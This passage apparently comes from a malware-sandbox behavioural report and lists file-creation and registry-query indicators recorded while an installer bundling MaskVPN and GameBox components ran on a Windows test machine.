| File created | C:\Windows\SystemTemp\~DF4A5E0F324D2691EE.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA5B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f764ac1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC931.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAB9F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF1BDA4C0F335BF354.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5CE1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA778.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB0E0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB333.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC6AF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF253FAF2D4EF1B032.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
